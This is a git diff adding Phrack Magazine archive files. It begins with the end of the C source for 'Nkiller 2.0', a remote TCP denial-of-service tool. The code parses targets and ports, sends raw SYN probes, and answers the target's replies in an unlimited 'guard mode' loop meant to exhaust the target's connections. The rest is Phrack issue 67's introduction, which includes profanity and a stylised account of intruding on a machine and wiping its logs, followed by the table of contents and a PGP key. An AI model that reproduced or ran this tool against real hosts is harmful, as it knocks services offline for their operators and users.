+  while (current->port_val != port && current->next != NULL) {
+    before = current;
+    current = current->next;
+  }
+
+  if (current->port_val != port && current->next == NULL) {
+    if (current != Target->ports.first) {
+      if (o.debug2)
+        (void) fprintf(stderr, "Port %u not found in list\n", port);
+      return;
+    }
+  }
+
+  if (current != Target->ports.first) {
+    before->next = current->next;
+  } else {
+    Target->ports.first = current->next;
+  }
+  Target->portlen--;
+  if (!Target->portlen)
+    fatal("No port left to hit!\n");
+}
+
+
+
+/*
+ * Add new port to port linked list of Target
+ */
+static void
+port_add(HostInfo *Target, uint16_t port)
+{
+  port_elem *current;
+  port_elem *newNode;
+
+  newNode = xmalloc(sizeof(*newNode));
+
+  newNode->port_val = port;
+  newNode->next = NULL;
+
+  if (Target->ports.first == NULL) {
+    Target->ports.first = newNode;
+    Target->ports.last = newNode;
+    return;
+  }
+
+  current = Target->ports.last;
+  current->next = newNode;
+  Target->ports.last = newNode;
+}
+
+
+
+/* 
+ * Return a random port from portlist
+ */
+static uint16_t
+port_get_random(HostInfo *Target)
+{
+  port_elem *temp;
+  unsigned int i, offset;
+
+  temp = Target->ports.first;
+  offset = (random() % Target->portlen);
+  i = 0;
+  while (i < offset) {
+    temp = temp->next;
+    i++;
+  }
+  return temp->port_val;
+}
+
+
+
+/*
+ * Prepare the payload that will be sent in the 3rd phase
+ * of the Connection-estalishment handshake (piggypacked
+ * along with the ACK of the peer's SYNACK)
+ */
+static void
+handle_payloads(HostInfo *Target)
+{
+  if (o.payload[0]) {
+    Target->plen = strlen(o.payload);
+    Target->payload = xmalloc(Target->plen);
+    strncpy(Target->payload, o.payload, Target->plen);
+  } else {
+    Target->payload = NULL;
+    Target->plen = 0;
+  }
+
+  if (o.path[0]) {
+    if (o.vhost[0]) {
+      Target->wlen = strlen(o.path) + strlen(o.vhost) +
+        sizeof("GET  HTTP/1.0\015\012Host: \015\012\015\012") - 1;
+      Target->url = xmalloc(Target->wlen + 1);
+      /* + 1 for trailing '\0' of snprintf()  */
+      snprintf(Target->url, Target->wlen + 1, 
+          "GET %s HTTP/1.0\015\012Host: %s\015\012\015\012",
+          o.path, o.vhost);
+    } else {
+      Target->wlen = strlen(o.path) + 
+        sizeof("GET  HTTP/1.0\015\012\015\012") - 1;
+      Target->url = xmalloc(Target->wlen + 1); 
+      snprintf(Target->url, Target->wlen + 1, 
+          "GET %s HTTP/1.0\015\012\015\012", o.path);
+    }
+  } else {
+    Target->wlen = sizeof(WEB_PAYLOAD) - 1;
+    Target->url = xmalloc(Target->wlen);
+    memcpy(Target->url, WEB_PAYLOAD, Target->wlen);
+  }
+}
+
+
+
+/* No way you have seen this before! */
+static uint16_t
+checksum_comp(uint16_t *addr, int len)
+{
+  register long sum = 0;
+  uint16_t checksum;
+  int count = len;
+  uint16_t temp;
+
+  while (count > 1)  {
+    temp = *addr++;
+    sum += temp;
+    count -= 2;
+  }
+  if (count > 0)
+    sum += *(char *) addr;
+
+  while (sum >> 16)
+    sum = (sum & 0xffff) + (sum >> 16);
+
+  checksum = ~sum;
+  return checksum;
+}
+
+
+
+int
+main(int argc, char **argv)
+{
+  int print_help;
+  int opt;
+  int required;
+  int debug_level;
+  size_t i;
+  unsigned int portlen;
+  unsigned int probes, probes_sent, probes_left;
+  unsigned int probes_this_rnd, probes_rnd_fini;
+  int unlimited, state, probe_byusr;
+  HostInfo *Target;
+  SniffInfo *Sniffer;
+  u_char *reply;
+  char *endp; 
+
+  srandom(time(0));
+
+  if (argc == 1) {
+    usage();
+  }
+
+  memset(&o, 0, sizeof(o));
+  unlimited = 0;
+  required = 0;
+  portlen = 0;
+  print_help = 0;
+  probe_byusr = 0;
+
+  probes = DEFAULT_NUM_PROBES;
+  o.sleep = DEFAULT_SLEEP_TIME;
+  o.probes_per_rnd = DEFAULT_PROBES_RND;
+  o.probe_interval = DEFAULT_PROBE_INTERVAL;
+  strncpy(o.skey, DEFAULT_KEY, sizeof(o.skey));
+  o.polltime = DEFAULT_POLLTIME;
+
+  /* Option parsing */
+  while ((opt = getopt(argc, argv, "t:k:l:w:c:p:n:vd:s:r:N:T:P:yhg"))
+      != -1)
+  {
+    switch (opt)
+    {
+      case 't':   /* target address */
+        strncpy(o.target, optarg, sizeof(o.target));
+        required++;
+        break;
+      case 'k':   /* secret key */
+        strncpy(o.skey, optarg, sizeof(o.skey));
+        break;
+      case 'l':   /* payload */
+        strncpy(o.payload, optarg, sizeof(o.payload) - 1);
+        break;
+      case 'w':  /* path */
+        strncpy(o.path, optarg, sizeof(o.path) - 1);
+        break;
+      case 'r':    /* vhost name */
+        strncpy(o.vhost, optarg, sizeof(o.vhost) -1);
+        break;
+      case 'c':   /* polltime */
+        endp = NULL;
+        o.polltime = strtoul(optarg, &endp, 0);
+        if (errno != 0 || *endp != '\0')
+          fatal("Invalid polltime: %s\n", optarg);
+        break;
+      case 'p':   /* destination port */
+        if (!(o.portlist = port_parse(optarg, &portlen))) 
+          fatal("Couldn't parse ports!\n");
+        required++;
+        break;
+      case 'n':   /* number of probes */
+        endp = NULL;
+        o.probes = strtoul(optarg, &endp, 0);
+        if (errno != 0 || *endp != '\0')
+          fatal("Invalid probe number: %s\n", optarg);
+        probe_byusr++;
+        if (!o.probes) {
+          unlimited++;
+          probe_byusr = 0;
+        }
+        break;
+      case 'N':    /* probes per round */
+        endp = NULL;
+        o.probes_per_rnd = strtoul(optarg, &endp, 0);
+        if (errno != 0 || *endp != '\0')
+          fatal("Invalid probes-per-round number: %s\n", optarg);
+        break;
+      case 'T':    /* template number */
+        endp = NULL;
+        o.template = strtoul(optarg, &endp, 0);
+        if (errno != 0 || *endp != '\0')
+          fatal("Invalid template number: %s\n", optarg);
+        break;
+      case 'P':    /* probe timer interval */
+        endp = NULL;
+        o.probe_interval = strtoul(optarg, &endp, 0);
+        if (errno != 0 || *endp != '\0')
+          fatal("Invalid probe-interval number: %s\n", optarg);
+        break;
+      case 'g':  /* guard mode */
+        o.guardmode++;
+        break;
+      case 'v':  /* verbose mode */
+        o.verbose++;
+        break;
+      case 'd':  /* debug mode */
+        endp = NULL;
+        debug_level = strtoul(optarg, &endp, 0);
+        if (errno != 0 || *endp != '\0')
+          fatal("Invalid probe number: %s\n", optarg);
+        if (debug_level != 1 && debug_level != 2)
+          fatal("Debug level must be either 1 or 2\n");
+        else if (debug_level == 1)
+          o.debug++;
+        else {
+          o.debug2++;
+          o.debug++;
+        }
+        break;
+      case 's':   /* sleep time between each probe */
+        endp = NULL;
+        o.sleep = strtoul(optarg, &endp, 0);
+        if (errno != 0 || *endp != '\0')
+          fatal("Invalid sleep number: %s\n", optarg);
+        break;
+      case 'y':   /* dynamic port handling */
+        o.dynamic++;
+        break;
+      case 'h':   /* help - usage */
+        print_help = 1;
+        break;
+      case '?':   /* error */
+        usage();
+        break;
+    }
+  }
+
+  if (print_help) {
+    help();
+    exit(EXIT_SUCCESS);
+  }
+
+  if (getuid() && geteuid())
+    fatal("You need to be root.\n");
+
+  if (required < 2)
+    fatal("You have to define both -t <target> and -p <portlist>\n");
+
+  (void) fprintf(stdout, "\nStarting Nkiller 2.0 "
+      "( http://sock-raw.org )\n");
+
+  Target = xmalloc(sizeof(HostInfo));
+  Sniffer = xmalloc(sizeof(SniffInfo));
+
+  Target->portlen = portlen;
+  for (i = 0; i < Target->portlen; i++)
+    port_add(Target, o.portlist[i]);
+
+  if (!unlimited && probe_byusr)
+    probes = o.probes;
+
+  inet_pton(AF_INET, o.target, &Target->daddr);
+
+  handle_payloads(Target);
+  sniffer_init(Target, Sniffer);
+
+  if (o.verbose) {
+    if (unlimited) 
+      (void) fprintf(stdout, "Probes: unlimited\n");
+    else 
+      (void) fprintf(stdout, "Probes: %u\n", probes);
+    (void) fprintf(stdout, 
+        "Probes per round: %u\n"
+        "Pcap polling time: %u microseconds\n"
+        "Sleep time: %u microseconds\n"
+        "Key: %s\n"
+        "Probe interval: %u seconds\n"
+        "Template: %s\n", o.probes_per_rnd, o.polltime,
+        o.sleep, o.skey, o.probe_interval, get_template(o.template));
+    if (o.guardmode)
+      (void) fprintf(stdout, "Guardmode on\n");
+  }
+
+  probes_sent = 0;
+  probes_left = probes;
+  probes_rnd_fini = 0;
+  probes_this_rnd = 0;
+
+  /* Main loop */
+  while (probes_left || o.guardmode || unlimited) {
+
+    if (probes_rnd_fini >= o.probes_per_rnd) {
+      probes_rnd_fini = 0;
+      probes_this_rnd = 0;
+    }
+
+    if (!unlimited && probes_left == (0.5 * probes) && o.verbose)
+      (void) fprintf(stdout, "Half of probes left.\n");
+
+    if (probes_sent < probes && probes_this_rnd < o.probes_per_rnd) {
+      send_syn_probe(Target, Sniffer);
+      if (!unlimited)
+        probes_sent++;
+      probes_this_rnd++;
+    }
+
+    usleep(o.sleep);  /* Wait a bit before each probe */
+
+    state = check_replies(Target, Sniffer, &reply);
+
+    switch (state) 
+    {
+      case S_ERR: 
+        continue;
+        break;
+      case S_SYNACK:
+        send_probe(reply, Target, S_SYNACK);
+        free(reply);
+        break;
+      case S_FDACK:
+        continue;
+        break;
+      case S_PROBE:
+        send_probe(reply, Target, S_PROBE);
+        free(reply);
+        probes_rnd_fini++;
+        if (!unlimited)
+          probes_left--;
+        break;
+      case S_DATA_0:
+        send_probe(reply, Target, S_DATA_0);
+        free(reply);
+        if (o.template == T_BSDWIN)
+          probes_rnd_fini++;
+        break;
+      case S_DATA_1:
+        send_probe(reply, Target, S_DATA_1);
+        free(reply);
+        /* Increase aggressiveness */
+        probes_rnd_fini++; 
+        break;
+      default:
+        break;
+    }
+
+  }
+
+  (void) fprintf(stdout, "Finished.\n");
+  exit(EXIT_SUCCESS);
+}
+
+
+
+-- [ 6 - References
+
+[1]. netkill - generic remote DoS attack by stanislav shalunov -
+http://seclists.org/bugtraq/2000/Apr/0152.html
+
+[2]. TCP DoS Vulnerabilities by Fabian 'fabs' Yamaguchi -
+http://www.recurity-labs.com/content/pub/25C3TCPVulnerabilities.pdf
+
+[3]. TCP/IP Illustrated vol. 1 - W. Richard Stevens
+
+[4]. Linux Kernel Development (Chapter 10 - Timers and Time Management)
+  - Robert Love
+
+Additional related material:
+
+[5]. Understanding Linux Network Internals (O'reilly)
+
+[6]. Understanding the Linux Kernel (O'reilly)
+
+[7]. Dave Miller's TCP notes:
+      - http://vger.kernel.org/~davem/tcp_output.html
+      - http://vger.kernel.org/~davem/tcp_skbcb.html
+
+[8]. The Design and Implementation of the FreeBSD Operating System
+
+--------[ EOF
diff --git a/phrack67/1.txt b/phrack67/1.txt
new file mode 100644
index 0000000..c42aca0
--- /dev/null
+++ b/phrack67/1.txt
@@ -0,0 +1,415 @@
+                             ==Phrack Inc.==
+
+		Volume 0x0e, Issue 0x43, Phile #0x01 of 0x10
+
+|=----------------------------------------------------------------------=|
+|=--------------------------=[ Introduction ]=--------------------------=|
+|=----------------------------------------------------------------------=|
+|=----------------------=[ By The Phrack Staff ]=-----------------------=|
+|=----------------------------------------------------------------------=|
+|=----------------------=[  November 17, 2010  ]=-----------------------=|
+|=----------------------------------------------------------------------=|
+
+
+        "The greatest trick the Devil ever pulled was convincing
+         the world he didn't exist"
+                                  --- Verbal Kint
+
+
+        It's 1.00 a.m., nobody hits this secondary road. Heck, I'm almost
+sure half of it doesn't have a line to remind you that you should share it
+with upcoming cars. It's raining, but not too hard. I'm going home.
+
+        It's Tuesday. What the hell am I doing out here, half an hour from
+home, slowly driving under the rain? It's 1.05 a.m., I know this road, I
+know this feeling, I recognize the shivering. I let it flow. Turn off the
+music, I want silence.
+
+        It's 2.00 a.m., nobody hits this machine at this time of the day.
+Logs track me, but I'll clean them. I know this road, I know this feeling, 
+I recognize the shivering. Turn on the music, the game is on. I'm sure 
+someone else is around here, someone else has seen this # before.
+
+        "I'll fuck you if you don't fuck me first, sir". Fair enough, this
+is the rule. I'll go to sleep afterwards. I'm meeting some friends and I've
+to take a train tomorrow. I'll sleep on the couch of someone I've never
+seen before, yet I know him well.
+
+        It's 1.00 a.m., 10 years later. It's a GPG email from the guy that
+once offered me a couch. Then another time. I can count the times I've seen
+him in person on two hands, but I would overflow a 'short' counting the
+words we exchanged. We meet again, thought you disappeared. Things change,
+indeed. Life gave us something to lose and we are holding on it. We lost
+people, money, opportunities, that's why we hold on. Once a hacker, forever
+a hacker, right? Let's finish this code. Let's visit this city.
+
+        It's 2.00 a.m., today. Nothing in this story, in this Intro, is 
+real. I wasn't there, this is not me. This is just a stream of ASCII
+characters. Someone out there pulled a great trick and convinced the world
+that security was a cool business. Someone is pulling even greater tricks
+and makes money out of his ignorance living on others slightly bigger
+ignorance. Somewhere, a crackdown on some kids proves to be necessary to
+keep the 'mistery' alive, to keep the bandwagon going. Someone spies on
+former fellow friends, 'cause that's worth millions. Everybody is happy and
+we slowly fade away. Away, towards a new Underground.
+
+        "I'll fuck you if you don't fuck me first, sir".
+
+If you are shivering, if you have been there, if you feel it, you know what
+I mean. PHRACK may die. Groups may die. Things as we know today may die.
+The great trick might actually seem to work -- goodbye Underground, welcome
+Security Industry. Not too fast.
+
+        "Once a hacker, forever a hacker, right?"
+
+        The Game is on.
+
+
+                      -----( Phrack Issue #67 )-----
+
+
+It's with incredible pleasure that we present you our newly released issue: 
+
+ ______  _     _ ______  _______ _______ _     _      _ _   _______ ______ 
+(_____ \(_)   (_|_____ \(_______|_______|_)   | |   _| U |_(_______|______)
+ _____) )_______ _____) )_______ _       _____| |  (_     _)______       _  
+|  ____/|  ___  |  __  /|  ___  | |     |  _   _)   _| O |_|  ___ \     / ) 
+| |     | |   | | |  \ \| |   | | |_____| |  \ \   (_     _) |___) )   / /  
+|_|     |_|   |_|_|   |_|_|   |_|\______)_|   \_)    |_n_| |______/   (_/   
+
+                 - By the community, for the community. -
+
+
+But wait ... the release date ... it sounds familiar ... OMFG!!! 
+
+
+                                 \\\ ,
+                                  \ `|
+                                   ) (   .-""-.
+                                   | |  /_  {  '.
+                                   | | (/ `\   } )
+                                   | |  ^/ ^`}   {
+                                   \  \ \=  ( {   )
+                                    \  \ '-, {   {{
+                                     \  \_.'  ) }  )
+                                      \.-'   (     (
+                                      /'-.'_. ) (  }
+                                      \_(    {   _/\
+                                       ) '--' `-;\  \
+                                   _.-'       /  / /
+                            <\/>_.'         .'  / /
+                        <\/></\>/.  '      /<\// /
+                        </\>  _ |\`- _ . -/|<// (
+                     <\/>    - _- `  _.-'`_/- |  \
+                     </\>        -  - -  -     \\\
+                      }`<\/>                <\/>`{
+                      { </\>-<\/>_<\/>_<\/>-</\> }
+                      }      </\> </\> </\>      {
+                   <\/>.                         <\/>
+                   </\>                          </\>
+                    {`<\/>                     <\/>`}
+                    } </\>-<\/>_<\/>_<\/>_<\/>-</\> {
+                    {      </\> </\> </\> </\>      }
+                    }                               }
+                    {           H A P P Y           {
+                    }                               }
+                    {             25th              {
+                 <\/>                               <\/>
+                 </\>        B I R T H D A Y        </\>
+                   `<\/>                          <\/>'
+                jgs </\>-<\/>_<\/>_<\/>_<\/>_<\/>-</\>
+                         </\> </\> </\> </\> </\>
+
+
+Yes. That's right friends. This 67th issue is the celebration of Phrack's 
+25th birthday. Happy birthday Phrack!
+
+
+                    -----( Coming from the past )-----
+
+Once upon a midnight dreary, while I pondered, weak and weary, over many a 
+quaint and curious volume of forgotten lore...
+
+Hello Cyberpals. It's your old friend Mike Schiffman AKA route AKA daemon9.
+*Cyberhug!* It sure has been a long time! Well I'll be! You guys all look 
+the same, young and eager and hungry... Me? I'm still here, just older and 
+grayer and bit less conspicuous. Ok, I'll say it -- I'm downright honored 
+that you crazy rascals still remember me.
+
+It sure has been many a fortnight that I've been in this business. I mean, 
+back in 1994, when I started poking around the scene in I was just a little
+dork who use to work out a lot and bleach my hair white. Sure I was 
+probably the first muscle-bound white-haired guy with giant computer chip 
+tattoo on his back who had this tireless thirst for computers and hacking 
+and writing all sorts of Usenet posts and papers -- but there would legions
+more to come...
+
+Now in 2010 I'm a much bigger and more experienced dork. It's more than 16 
+years later. I have many more tattoos and the hair is getting white all by 
+itself. And I reminisce... I look back and reflect on those days. Some of 
+the stuff I use to do... My comp.security Usenet posts. "The Infinity 
+Concept" e-zine, the precursor to my Phrack editorial days. My netcom.com 
+.plan file. The PGP Attack FAQ.
+
+I remember getting owned. I remember the first time my phones got done up 
+and you miscreants forwarded my calls to bridge and told people I had died 
+of AIDS. I remember my girlfriend at the time being scared shitless of what
+was next. I remember my dox getting dumped to #phrack. I remember u4ea 
+threatening to insert my SSN into the NCIC. I remember Bane and u4ea 
+calling my house repeatedly. I also remember pictures of u4ea 
+cross-dressing. I remember Bane getting backhanded by Synapse at Defcon 4. 
+I remember Special Agent Peter Trahon and his partner who looked and 
+sounded like Sargent Slaughter from GI JOE both from the San Francisco FBI 
+Computer Crime task force picking me in a late model Crown Victoria and 
+taking me to Max's Opera Cafe in Walnut Creek, CA and shaking me down for 
+dirt on other cyber-dorks they were investigating... I remember teardrop. 
+I remember Loki. I remember TQBF telling me that I had better be real 
+careful in releasing the technique/code of ICMP covert channel tunneling as
+I was "stepping on active people's toes"... I remember hooking an old 
+landline phone up to my neighbor's wiring to call him and discuss it... I 
+remember Carolyn Meinel... And her daughter Virginia at Defcon 5. I 
+remember Eric Bloodaxe tapping me to be a Phrack editor a long with Voyager
+and Redragon. I remember overshadowing them and bringing my own editorial 
+team onboard... I remember how awesome it was to be a Phrack Editor. 
+
+I remember how awesome Phrack was. How amazing it still is. Kudos to the 
+current editorial team for keeping it alive, and here's to another 25 
+years. Come find me then, and prophile me.
+
+                                                XOXO Scene, 
+
+                                        MS AKA Route AKA daemon9
+
+
+                  -----( What you were waiting for )-----
+
+Telling you that we're proud to release this issue would be an euphemism 
+for many reasons including, and that is the most important, the pleasure
+you will have while reading it. Oh and by the way, we apologize for the 
+wait ...
+
+08:21 |     --->| su [~su@201.6.x.y] #phrack
+08:23 |     --->| arr[][] [arr@fledge.z.org] #phrack
+08:29 |      su | halfdead, are you having trouble in man gcc this time? is
+                  that why phrack's issue is so late?
+08:30 |    Dreg | wtf
+08:30 | @bab00n | hoho
+
+Double. No. Triple private joke. You may have waited a long time but at 
+least we made it before ZF #06 ;>
+
+$ cat p67/index.txt
+
+<--------------------------( Table of Contents )-------------------------->
+
+ 0x01  Introduction ....................................... Phrack Staff
+ 
+ 0x02  Phrack Prophile on punk ............................ Phrack Staff
+ 
+ 0x03  Phrack World News .................................. EL ZILCHO
+ 
+ 0x04  Loopback (is back) ................................. Phrack Staff
+ 
+ 0x05  How to make it in Prison ........................... TAp
+ 
+ 0x06  Kernel instrumentation using kprobes ............... ElfMaster
+ 
+ 0x07  ProFTPD with mod_sql pre-authentication ............ FelineMenace
+ 
+ 0x08  The House Of Lore: Reloaded ........................ blackngel
+ 
+ 0x09  A Eulogy for Format Strings ........................ Captain Planet
+ 
+ 0x0a  Dynamic Program Analysis and Software Exploitation . BSDaemon
+ 
+ 0x0b  Exploiting memory corruptions in Fortran programs .. Magma
+       under UNIX/VMS
+ 
+ 0x0c  PHRACKERZ: Two Tales ............................... Antipeace 
+                                                                & 
+                                                            The Analog Kid
+ 
+ 0x0d  Scraps of notes on remote stack overflow ........... pi3
+       exploitation
+ 
+ 0x0e  Notes Concerning the Security, Design and .......... The Philosopher
+       Administration of Siemens DCO-CS Digital 
+       Switching Systems                                                
+ 
+ 0x0f  Hacking the mind for fun and profit ................ lvxferis
+
+ 0x10  International Scenes ............................... various
+
+<------------------------------------------------------------------------->
+
+Have you ever noticed how some issues seemed to have a thematic? Consider 
+for example p66. There are 4 papers dealing with heap exploitation. Now 
+take p63. 5 papers are about (anti)reverse engineering and binary 
+manipulation techniques and p62 clearly has a Windows color. Weird, isn't 
+it? Coincidence? Bias in the uniform distribution of hacking playgrounds? 
+I'll let you draw your own conclusions.
+
+For this issue, with no doubts, the focus is on userland exploitation. Did
+you really think that you had seen everything? Well how about debugging 
+some heap? While FelineMenace gives you tricks using an usual practical 
+case (hint: don't miss the source code), blackngel explains in detail the 
+House Of Lore technique. Having troubles with fortify? Go read Captain 
+Planet's excellent paper on format bugs as well as pi3's notes about 
+cookies. It might be handy. 
+
+Exploiting bugs is cool but finding them is de facto mandatory. That's when
+BSDaemon's paper comes to play. Read it and learn about how to instrument 
+programs. Now what about a new playground? Discover the joy of Fortran 
+hacking with Magma. Oh btw he may just have lost it you know... 
+
+Missing kernel fun? Why not reading ElfMaster's paper. You'll certainly 
+learn a bit of useful things, truly. Missing the good old phreaking days? 
+Thank The Philosopher for his contribution (you made us crazy man !@#) and
+go learning about old school DCO-CS hacking.
+
+The best for the end. We have the luck to have no more than 4 non technical
+papers for this issue. You don't care? Fucking idiot, go away. 
+
+Though we already thanked them, let us highlight EL ZILCHO, TAp, Antipeace,
+The Analog Kid, lvxferis & the anonymous contributors of the "International
+Scenes" phile. Phrack is without a doubt one of the most technical source 
+of knowledge of the whole hacking scene thanks to its writers. But the 
+most important aspect is not the technical one. Nowadays there are lots of 
+impressive sources of information (blogs, books, conferences) freely 
+available on Internet. However they all lack a soul. Phrack has a spirit 
+and that's its true power.
+
+Now as a demonstration of the so-called spirit, we have the brilliant work
+of EL ZILCHO. Tired of the crap published on zdnet? Then have a taste of 
+the Phrack World News. Eager to learn about life experiences? TAp is your 
+man with one of the most fascinating papers of this issue. You should also
+consider alternative literature with lvxferis' paper. Ahah.
+
+Oh and if you're just passing by, attracted by the hacking culture but not 
+yet ready/able to embrace it then Phrackerz paper is for you. It should 
+bring you answers.
+
+                                    -- The Phrack Staff
+
+Ps: Oops sorry to forget o_O. It came to our attention after Pipacs' 
+profile publication in p66 that whitehats profile were the most wanted one.
+Unfortunately Theo was already on holidays [1] when we needed to start the
+interview. Sorry guyz ;> Have fun anyway with punk!
+
+[1] http://kerneltrap.org/mailarchive/openbsd-misc/2010/8/13/6186
+
+
+                    -----( GreetZ for issue #67 )-----
+
+As always and because our staff would have done nothing but shit without 
+them, we'd like to thank (in no particular order)...
+
+    - route/daemon9:      still able to make a kickass intro ;) 
+    - The Analog Kid:     the spirited kid   
+    - nullcon guyz:       nice people, visit their great country!
+    - EL ZILCHO:          fuck1ng great job!
+    - TAp:                peace bro :>
+    - ElfMaster:          yet another kernel hax0r ;)
+    - lvxferis:           who is this guy???
+    - FelineMenace:       the LOLCats team counterattacks ;-)
+    - spacewalker:        supportive & gifted belgian bro
+    - blackngel:          malloc's worse enemy
+    - Captain Planet:     fmt bugs' worse enemy (lake of inspiration 
+                                                 detected)
+    - argp & huku:        kudos for kickass answers in no time
+    - BSDaemon:           oi. Tudo bom?
+    - punk:               the whitehat k1ll3r
+    - the VX scene:       thanks for the support & various exchanges over
+                          past months. Special thanks to izee, herm1t and
+                          EOF writers.
+    - Magma:              take your pills gramps
+    - The Philosopher:    well done
+    - antipeace:          ~_o
+    - pi3:                Hi bulba! (oops wrong one)
+    - spy:                our IRC bot
+    - halfdead:           su said you contributed on IRC ;)
+
+    - the circle:         kudos for your past work.
+
+...for their contributions and support. Touching isn't it? But so true :-)
+
+
+                  -----( Phrack Magazine's policy )-----
+
+phrack:~# head -20 /usr/include/std-disclaimer.h
+/*
+ *  All information in Phrack Magazine is, to the best of the ability of
+ *  the editors and contributors, truthful and accurate.  When possible,
+ *  all facts are checked, all code is compiled.  However, we are not
+ *  omniscient (hell, we don't even get paid).  It is entirely possible
+ *  something contained within this publication is incorrect in some way.
+ *  If this is the case, please drop us some email so that we can correct
+ *  it in a future issue.
+ *
+ *
+ *  Also, keep in mind that Phrack Magazine accepts no responsibility for
+ *  the entirely stupid (or illegal) things people may do with the
+ *  information contained herein.  Phrack is a compendium of knowledge,
+ *  wisdom, wit, and sass.  We neither advocate, condone nor participate
+ *  in any sort of illicit behavior.  But we will sit back and watch.
+ *
+ *
+ *  Lastly, it bears mentioning that the opinions that may be expressed in
+ *  the articles of Phrack Magazine are intellectual property of their
+ *  authors.
+ *  These opinions do not necessarily represent those of the Phrack Staff.
+ */
+
+                  -----( Contact Phrack Magazine )-----
+
+
+            <  Editors           : staff[at]phrack{dot}org   >
+            >  Submissions       : staff[at]phrack{dot}org   <
+            <  Commentary        : loopback[@]phrack{dot}org >
+            >  Phrack World News : pwned[at]phrack{dot}org   <
+
+ 
+    Submissions may be encrypted with the following PGP key:
+    (Hint: Always use the PGP key from the latest issue)
+
+
+-----BEGIN PGP PUBLIC KEY BLOCK-----
+Version: PHRACK
+
+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
+=cK7U
+-----END PGP PUBLIC KEY BLOCK-----
diff --git a/phrack67/10.txt b/phrack67/10.txt
new file mode 100644
index 0000000..0bac982
--- /dev/null
+++ b/phrack67/10.txt
@@ -0,0 +1,36412 @@
+                             ===Phrack Inc.==
+
+		Volume 0x0e, Issue 0x43, Phile #0x0a of 0x10
+
+|=----------------------------------------------------------------------=|
+|=-------=[ Dynamic Program Analysis and Software Exploitation ]=-------=|
+|=---------------=[ From the crash to the exploit code ]=---------------=|
+|=----------------------------------------------------------------------=|
+|=----------------------------------------------------------------------=|
+|=---------------=[ By BSDaemon                              ]=---------=|
+|=---------------=[ <bsdaemon *noSPAM* risesecurity_org>     ]=---------=|
+|=----------------------------------------------------------------------=|
+|=-------------------------=[ August 14 2010  ]=------------------------=|
+|=----------------------------------------------------------------------=|
+
+					"Don't matter what do you beleive
+happens when someone dies, the life always continues through the others who
+remember."
+				Md. Sergio da Silva Branco
+				Beloved father and my hero.  God bless
+you!
+
+
+------[  Index
+
+  0 - Abstract
